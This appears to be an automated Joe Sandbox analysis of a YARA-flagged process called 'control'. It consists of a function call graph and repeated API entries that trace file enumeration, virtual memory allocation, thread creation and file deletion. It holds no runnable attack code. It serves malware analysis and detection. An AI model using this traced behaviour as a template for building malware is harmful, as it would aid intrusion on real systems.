LdrInitializeThunk 24140->24214 24143 50c890 NtClose 24141->24143 24147 50c890 NtClose 24142->24147 24146 4fc774 24143->24146 24145->24142 24146->24106 24149 4fc70c 24147->24149 24148 4fc78c 24148->24141 24150 4fc793 24148->24150 24209 50b770 24149->24209 24151 4fc7ab 24150->24151 24215 4fc460 LdrInitializeThunk 24150->24215 24216 4fc2c0 NtClose LdrInitializeThunk LdrInitializeThunk 24151->24216 24153 4fc723 24153->24164 24212 4f7ae0 LdrLoadDll 24153->24212 24157 4fc739 24157->24106 24158 4fc7e3 24159 50c890 NtClose 24158->24159 24160 4fc83c 24159->24160 24161 50c890 NtClose 24160->24161 24162 4fc846 24161->24162 24162->24164 24217 4f7ae0 LdrLoadDll 24162->24217 24164->24106 24166 4fe543 24165->24166 24230 50c290 24166->24230 24170 4fdfa7 24169->24170 24171 4fdfc7 24169->24171 24170->24171 24235 4fddc0 24170->24235 24178 4fe009 24171->24178 24255 4fdc00 24171->24255 24177 507370 7 API calls 24177->24178 24178->24106 24180 4fe37d 24179->24180 24186 50c3c0 24180->24186 24183 4fe3c5 24183->24126 24187 50c3dc 24186->24187 24194 10999a0 LdrInitializeThunk 24187->24194 24188 4fe3be 24188->24183 24190 50c410 24188->24190 24191 50c42c 24190->24191 24195 1099780 LdrInitializeThunk 24191->24195 24192 4fe3ee 24192->24126 24194->24188 24195->24192 24201 4fdc9e 24196->24201 24218 4fd630 24196->24218 24198 50e3e0 RtlAllocateHeap 24199 4fddb1 24198->24199 24199->24129 24202 4fdda2 24201->24202 24225 50b5f0 24201->24225 24202->24198 24204 4f9beb 24203->24204 24205 4fe1a0 2 API calls 24204->24205 24208 4f9d01 24204->24208 24206 4f9cec 24205->24206 24207 50c890 NtClose 24206->24207 24206->24208 24207->24208 24208->24132 24210 4fe530 LdrInitializeThunk 24209->24210 24211 50b7a2 24210->24211 24211->24153 24212->24157 24213->24140 24214->24148 24215->24151 24216->24158 24217->24164 24219 4fd663 24218->24219 24220 4fe360 2 API calls 24219->24220 24221 4fd6b8 24220->24221 24222 4fd6bf 24221->24222 24229 50e420 RtlAllocateHeap 24221->24229 24222->24201 24224 4fd6cf 24224->24201 24226 
50b5ff 24225->24226 24227 50b63d 24226->24227 24228 50b62a CreateThread 24226->24228 24227->24202 24228->24202 24229->24224 24231 50c2ac 24230->24231 24234 1099840 LdrInitializeThunk 24231->24234 24232 4fe56e 24232->24106 24234->24232 24236 4fddf0 24235->24236 24269 506690 24236->24269 24238 4fde41 24290 505540 24238->24290 24240 4fde47 24319 502360 24240->24319 24242 4fde4d 24346 5045c0 24242->24346 24248 4fde61 24380 505db0 24248->24380 24250 4fde67 24384 4ffca0 24250->24384 24252 4fde7f 24396 500f40 24252->24396 24256 4fdc6f 24255->24256 24257 4fdc18 24255->24257 24256->24178 24261 4fda40 24256->24261 24257->24256 24258 501180 7 API calls 24257->24258 24259 4fdc59 24258->24259 24259->24256 24603 5013d0 11 API calls 24259->24603 24262 4fda5c 24261->24262 24266 4fda77 24261->24266 24263 50c890 NtClose 24262->24263 24262->24266 24263->24266 24264 4fdbee 24264->24177 24264->24178 24265 507370 7 API calls 24265->24264 24268 4fdbd1 24266->24268 24604 4fd100 NtClose LdrInitializeThunk LdrInitializeThunk 24266->24604 24268->24264 24268->24265 24270 5066b8 24269->24270 24271 4fccf0 2 API calls 24270->24271 24273 5066ff 24271->24273 24272 506706 24272->24238 24273->24272 24401 4fcdb0 24273->24401 24275 506776 24277 5067b8 24275->24277 24287 50693b 24275->24287 24405 5063e0 LdrLoadDll NtClose RtlFreeHeap LdrInitializeThunk LdrInitializeThunk 24275->24405 24278 4fcdb0 LdrInitializeThunk 24277->24278 24281 5067fc 24278->24281 24279 506842 24280 4fcdb0 LdrInitializeThunk 24279->24280 24284 506872 24280->24284 24281->24279 24281->24287 24406 5063e0 LdrLoadDll NtClose RtlFreeHeap LdrInitializeThunk LdrInitializeThunk 24281->24406 24283 5068b8 24286 4fcdb0 LdrInitializeThunk 24283->24286 24284->24283 24284->24287 24407 5063e0 LdrLoadDll NtClose RtlFreeHeap LdrInitializeThunk LdrInitializeThunk 24284->24407 24289 506917 24286->24289 24287->24238 24289->24287 24408 5063e0 LdrLoadDll NtClose RtlFreeHeap LdrInitializeThunk LdrInitializeThunk 24289->24408 24291 5055a4 24290->24291 
24292 4fccf0 2 API calls 24291->24292 24294 5056a4 24292->24294 24293 5056ab 24293->24240 24294->24293 24295 4fcdb0 LdrInitializeThunk 24294->24295 24297 505713 24295->24297 24296 505833 24296->24240 24297->24296 24298 505842 24297->24298 24414 505330 24297->24414 24299 50c890 NtClose 24298->24299 24301 50584c 24299->24301 24301->24240 24302 505748 24302->24298 24303 505753 24302->24303 24304 50e3e0 RtlAllocateHeap 24303->24304 24305 50577c 24304->24305 24306 505785 24305->24306 24307 50579b 24305->24307 24309 50c890 NtClose 24306->24309 24423 505220 CoInitialize 24307->24423 24311 50578f 24309->24311 24310 5057a9 24425 50c5a0 24310->24425 24311->24240 24313 505822 24314 50c890 NtClose 24313->24314 24315 50582c 24314->24315 24316 50e300 RtlFreeHeap 24315->24316 24316->24296 24317 5057c7 24317->24313 24318 50c5a0 LdrInitializeThunk 24317->24318 24318->24317 24320 502388 24319->24320 24321 50e3e0 RtlAllocateHeap 24320->24321 24323 5023e8 24321->24323 24322 5023f1 24322->24242 24323->24322 24430 5017c0 24323->24430 24325 50241a 24326 50243a 24325->24326 24454 501ad0 LdrLoadDll 24325->24454 24331 502458 24326->24331 24456 5040c0 GetFileAttributesW 24326->24456 24328 502428 24328->24326 24455 5020e0 7 API calls 24328->24455 24330 50244c 24457 5040c0 GetFileAttributesW 24330->24457 24334 5017c0 9 API calls 24331->24334 24335 50249f 24334->24335 24338 5024c0 24335->24338 24458 501ad0 LdrLoadDll 24335->24458 24337 5024de 24342 50e300 RtlFreeHeap 24337->24342 24338->24337 24460 5040c0 GetFileAttributesW 24338->24460 24340 5024ae 24340->24338 24459 5020e0 7 API calls 24340->24459 24341 5024d2 24461 5040c0 GetFileAttributesW 24341->24461 24344 502502 24342->24344 24344->24242 24347 5045e6 24346->24347 24473 4fe790 24347->24473 24349 504725 24350 4fde55 24349->24350 24477 5042d0 24349->24477 24352 505860 24350->24352 24353 4fde5b 24352->24353 24354 5045c0 10 API calls 24352->24354 24355 5032e0 24353->24355 24354->24353 24356 503302 24355->24356 24531 5031a0 24356->24531 24359 
5031a0 10 API calls 24360 503568 24359->24360 24361 5031a0 10 API calls 24360->24361 24362 503580 24361->24362 24363 5031a0 10 API calls 24362->24363 24364 503598 24363->24364 24365 5031a0 10 API calls 24364->24365 24366 5035b0 24365->24366 24367 5031a0 10 API calls 24366->24367 24369 5035cb 24367->24369 24368 5035e5 24368->24248 24369->24368 24370 5031a0 10 API calls 24369->24370 24371 503619 24370->24371 24372 5031a0 10 API calls 24371->24372 24373 503656 24372->24373 24374 5031a0 10 API calls 24373->24374 24375 503693 24374->24375 24376 5031a0 10 API calls 24375->24376 24377 5036d0 24376->24377 24378 5031a0 10 API calls 24377->24378 24379 50370d 24378->24379 24379->24248 24381 505dcd 24380->24381 24382 4fb160 LdrLoadDll 24381->24382 24383 505de8 24382->24383 24383->24250 24385 4ffcb6 24384->24385 24393 4ffcc1 24384->24393 24386 50e3e0 RtlAllocateHeap 24385->24386 24386->24393 24387 4ffcd7 24387->24252 24388 4ffdbc GetFileAttributesW 24388->24393 24389 4fff3f 24390 4fff58 24389->24390 24391 50e300 RtlFreeHeap 24389->24391 24390->24252 24391->24390 24393->24387 24393->24388 24393->24389 24394 503720 7 API calls 24393->24394 24540 50aa90 24393->24540 24544 50a920 8 API calls 24393->24544 24394->24393 24545 500cc0 24396->24545 24398 500f4d 24560 5009a0 24398->24560 24400 4fde91 24400->24171 24402 4fcdd5 24401->24402 24409 50c490 24402->24409 24405->24277 24406->24279 24407->24283 24408->24287 24410 50c4ac 24409->24410 24413 10996d0 LdrInitializeThunk 24410->24413 24411 4fce49 24411->24275 24413->24411 24415 50534c 24414->24415 24416 4fb160 LdrLoadDll 24415->24416 24418 505367 24416->24418 24417 505370 24417->24302 24418->24417 24419 4fb160 LdrLoadDll 24418->24419 24420 50543b 24419->24420 24421 4fb160 LdrLoadDll 24420->24421 24422 505494 24420->24422 24421->24422 24422->24302 24424 505285 24423->24424 24424->24310 24426 50c5bc 24425->24426 24429 1099610 LdrInitializeThunk 24426->24429 24427 50c5db 24427->24317 24429->24427 24431 501858 24430->24431 24432 4fcdb0 
LdrInitializeThunk 24431->24432 24433 501936 24432->24433 24434 501a7d 24433->24434 24468 50c520 24433->24468 24436 501a8e 24434->24436 24462 501180 24434->24462 24436->24325 24439 501a73 24440 50c890 NtClose 24439->24440 24440->24434 24441 50196f 24442 50c890 NtClose 24441->24442 24443 5019a9 24442->24443 24443->24436 24444 4fcdb0 LdrInitializeThunk 24443->24444 24445 501a05 24444->24445 24445->24436 24446 50c520 LdrInitializeThunk 24445->24446 24447 501a2a 24446->24447 24448 501a31 24447->24448 24449 501a5d 24447->24449 24451 50c890 NtClose 24448->24451 24450 50c890 NtClose 24449->24450 24452 501a67 24450->24452 24453 501a3b 24451->24453 24452->24325 24453->24325 24454->24328 24455->24326 24456->24330 24457->24331 24458->24340 24459->24338 24460->24341 24461->24337 24463 5011a5 24462->24463 24464 507370 7 API calls 24463->24464 24466 5012d7 24464->24466 24465 501391 24465->24436 24466->24465 24467 507370 7 API calls 24466->24467 24467->24465 24469 50c53c 24468->24469 24472 1099650 LdrInitializeThunk 24469->24472 24470 501964 24470->24439 24470->24441 24472->24470 24474 4fe7af 24473->24474 24475 4fe7c1 24474->24475 24476 4fe7b6 GetFileAttributesW 24474->24476 24475->24349 24476->24475 24499 50abf0 24477->24499 24479 5042e6 24480 504305 24479->24480 24481 504347 24479->24481 24487 50433b 24479->24487 24482 50432a 24480->24482 24483 50430d 24480->24483 24488 507370 7 API calls 24481->24488 24485 50e300 RtlFreeHeap 24482->24485 24484 50e300 RtlFreeHeap 24483->24484 24486 50431e 24484->24486 24485->24487 24486->24349 24487->24349 24489 50436f 24488->24489 24517 503720 24489->24517 24491 50437a 24495 504478 24491->24495 24496 504392 24491->24496 24492 50445f 24493 50e300 RtlFreeHeap 24492->24493 24494 504583 24493->24494 24494->24349 24495->24492 24528 503cb0 8 API calls 24495->24528 24496->24492 24527 503cb0 8 API calls 24496->24527 24500 50abfe 24499->24500 24501 50ac05 24499->24501 24500->24479 24502 4fb160 LdrLoadDll 24501->24502 24503 50ac37 24502->24503 24504 
50e3e0 RtlAllocateHeap 24503->24504 24513 50adf9 24503->24513 24505 50ac5f 24504->24505 24506 50ac74 24505->24506 24507 50add8 24505->24507 24505->24513 24529 503800 LdrLoadDll 24506->24529 24508 50ade2 24507->24508 24509 50ae7b 24507->24509 24530 503800 LdrLoadDll 24508->24530 24512 50e300 RtlFreeHeap 24509->24512 24512->24513 24513->24479 24514 50ac8b 24514->24513 24515 50e300 RtlFreeHeap 24514->24515 24516 50adcc 24515->24516 24516->24479 24518 507370 7 API calls 24517->24518 24519 503736 24518->24519 24520 503743 24519->24520 24521 507370 7 API calls 24519->24521 24520->24491 24522 503754 24521->24522 24522->24520 24523 507370 7 API calls 24522->24523 24524 50376f 24523->24524 24525 50e300 RtlFreeHeap 24524->24525 24526 50377c 24525->24526 24526->24491 24527->24496 24528->24495 24529->24514 24530->24513 24532 5031c9 24531->24532 24533 5032cc 24532->24533 24534 503270 FindFirstFileW 24532->24534 24533->24359 24534->24533 24538 50328b 24534->24538 24535 5032b3 FindNextFileW 24537 5032c5 FindClose 24535->24537 24535->24538 24537->24533 24538->24535 24539 503080 10 API calls 24538->24539 24539->24538 24541 50aaa6 24540->24541 24543 50aba6 24540->24543 24542 507370 7 API calls 24541->24542 24541->24543 24542->24541 24543->24393 24544->24393 24546 500ce5 24545->24546 24547 4fe790 GetFileAttributesW 24546->24547 24549 500ddf 24547->24549 24548 500de6 24548->24398 24549->24548 24550 50abf0 3 API calls 24549->24550 24552 500df4 24550->24552 24551 500dfd 24551->24398 24552->24551 24553 50aa90 7 API calls 24552->24553 24555 500ed1 24552->24555 24572 500400 24552->24572 24553->24552 24556 500f29 24555->24556 24583 500760 24555->24583 24558 50e300 RtlFreeHeap 24556->24558 24559 500f30 24558->24559 24559->24398 24561 5009b6 24560->24561 24564 5009c1 24560->24564 24562 50e3e0 RtlAllocateHeap 24561->24562 24562->24564 24563 5009d7 24563->24400 24564->24563 24565 4fe790 GetFileAttributesW 24564->24565 24566 500c90 24564->24566 24569 50aa90 7 API calls 24564->24569 24570 500400 
8 API calls 24564->24570 24571 500760 7 API calls 24564->24571 24565->24564 24567 500ca9 24566->24567 24568 50e300 RtlFreeHeap 24566->24568 24567->24400 24568->24567 24569->24564 24570->24564 24571->24564 24573 500426 24572->24573 24574 507370 7 API calls 24573->24574 24575 500482 24574->24575 24576 503720 7 API calls 24575->24576 24577 50048d 24576->24577 24579 500610 24577->24579 24581 5004ab 24577->24581 24578 5005f5 24578->24552 24579->24578 24580 5002d0 8 API calls 24579->24580 24580->24579 24581->24578 24589 5002d0 24581->24589 24584 500786 24583->24584 24585 507370 7 API calls 24584->24585 24586 5007f7 24585->24586 24587 503720 7 API calls 24586->24587 24588 500802 24587->24588 24588->24555 24590 5002e6 24589->24590 24593 503b90 24590->24593 24592 5003ee 24592->24581 24594 503bcd 24593->24594 24595 503c7d 24594->24595 24597 503c20 24594->24597 24600 504b70 24594->24600 24595->24592 24598 50e300 RtlFreeHeap 24597->24598 24599 503c59 24597->24599 24598->24599 24599->24592 24601 5048b0 8 API calls 24600->24601 24602 504b84 24601->24602 24602->24597 24603->24256 24604->24268 24637 50b4a4 LdrLoadDll Sleep NtAllocateVirtualMemory
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • FindFirstFileW.KERNELBASE(?,00000000), ref: 00503281
                                                                                                                                                                                                                                                                                                • FindNextFileW.KERNELBASE(?,00000010), ref: 005032BE
                                                                                                                                                                                                                                                                                                • FindClose.KERNELBASE(?), ref: 005032C9
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.779545324.00000000004F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 004F0000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_4f0000_control.jbxd
                                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: Find$File$CloseFirstNext
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 3541575487-0
                                                                                                                                                                                                                                                                                                • Opcode ID: dc9b3bc0544ac893b94b9d92acb10c5a0b8d29a133be0aed039d4294c39566b2
                                                                                                                                                                                                                                                                                                • Instruction ID: 002be1c0c31725dfd47f4b38e520a3c7db943b3962cfed8ee7cef057f1db01da
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: dc9b3bc0544ac893b94b9d92acb10c5a0b8d29a133be0aed039d4294c39566b2
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7E31767590020ABBDB20DB64CC85FFF7B7CEB84704F144559F908A71D1EA70AB858BA4
                                                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.779545324.00000000004F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 004F0000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_4f0000_control.jbxd
                                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: ErrorMode
                                                                                                                                                                                                                                                                                                • String ID: 7$G{@1
                                                                                                                                                                                                                                                                                                • API String ID: 2340568224-1664923512
                                                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.779545324.00000000004F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 004F0000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_4f0000_control.jbxd
                                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: ErrorMode
                                                                                                                                                                                                                                                                                                • String ID: 7$G{@1
                                                                                                                                                                                                                                                                                                • API String ID: 2340568224-1664923512
                                                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • NtReadFile.NTDLL(005076A0,00502B68,FFFFFFFF,0050718A,00000002,?,005076A0,00000002,0050718A,FFFFFFFF,00502B68,005076A0,00000002,00000000), ref: 0050C855
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.779545324.00000000004F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 004F0000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_4f0000_control.jbxd
                                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: FileRead
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 2738559852-0
                                                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • NtCreateFile.NTDLL(00000060,00000000,?,005074DC,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,005074DC,?,00000000,00000060,00000000,00000000), ref: 0050C7AD
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.779545324.00000000004F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 004F0000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_4f0000_control.jbxd
                                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: CreateFile
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 823142352-0
                                                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • NtReadFile.NTDLL(005076A0,00502B68,FFFFFFFF,0050718A,00000002,?,005076A0,00000002,0050718A,FFFFFFFF,00502B68,005076A0,00000002,00000000), ref: 0050C855
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.779545324.00000000004F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 004F0000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_4f0000_control.jbxd
                                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: FileRead
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 2738559852-0
                                                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • NtAllocateVirtualMemory.NTDLL(00010000,?,00000000,004F17C4,00000004,00001000,00000000), ref: 0050C979
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.779545324.00000000004F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 004F0000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_4f0000_control.jbxd
                                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: AllocateMemoryVirtual
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 2167126740-0
                                                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • NtAllocateVirtualMemory.NTDLL(00010000,?,00000000,004F17C4,00000004,00001000,00000000), ref: 0050C979
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.779545324.00000000004F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 004F0000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_4f0000_control.jbxd
                                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: AllocateMemoryVirtual
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 2167126740-0
                                                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • NtDeleteFile.NTDLL(005074A2,00000002,?,005074A2,00000000,00000018,?,?,F162D13C,00000000,?), ref: 0050C885
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.779545324.00000000004F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 004F0000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_4f0000_control.jbxd
                                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: DeleteFile
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 4033686569-0
                                                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • NtDeleteFile.NTDLL(005074A2,00000002,?,005074A2,00000000,00000018,?,?,F162D13C,00000000,?), ref: 0050C885
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.779545324.00000000004F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 004F0000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_4f0000_control.jbxd
                                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: DeleteFile
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 4033686569-0
                                                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • NtClose.NTDLL(004FE515,00000000,?,004FE515,?,?,?,?,?,?,?,00000000,?,00000000), ref: 0050C8B5
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.779545324.00000000004F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 004F0000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_4f0000_control.jbxd
                                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: Close
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 3535843008-0
                                                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • NtClose.NTDLL(004FE515,00000000,?,004FE515,?,?,?,?,?,?,?,00000000,?,00000000), ref: 0050C8B5
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.779545324.00000000004F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 004F0000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_4f0000_control.jbxd
                                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: Close
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 3535843008-0
                                                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.781712983.0000000001030000.00000040.00001000.00020000.00000000.sdmp, Offset: 01030000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.781712983.000000000114B000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.781712983.000000000114F000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_1030000_control.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.781712983.0000000001030000.00000040.00001000.00020000.00000000.sdmp, Offset: 01030000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.781712983.000000000114B000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.781712983.000000000114F000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_1030000_control.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.781712983.0000000001030000.00000040.00001000.00020000.00000000.sdmp, Offset: 01030000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.781712983.000000000114B000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.781712983.000000000114F000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_1030000_control.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.781712983.0000000001030000.00000040.00001000.00020000.00000000.sdmp, Offset: 01030000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.781712983.000000000114B000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.781712983.000000000114F000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_1030000_control.jbxd
                                                                                                                                                                                                                                                                                                Similarity
